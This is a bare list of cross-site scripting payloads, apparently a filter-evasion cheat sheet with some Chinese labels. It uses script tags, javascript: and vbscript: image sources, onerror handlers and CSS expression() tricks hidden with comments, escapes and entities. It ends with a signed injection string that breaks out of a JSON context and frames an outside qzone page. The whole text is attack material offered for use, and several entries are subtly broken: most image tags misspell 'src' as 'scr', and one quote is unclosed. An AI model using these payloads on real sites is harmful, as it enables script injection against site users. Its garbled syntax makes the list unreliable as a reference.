<script>alert("跨站")</script> (most common)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (? is whitespace produced with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity: <div style={left:&#x0065;xpression (alert('xss'))}></div>
Unicode: <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["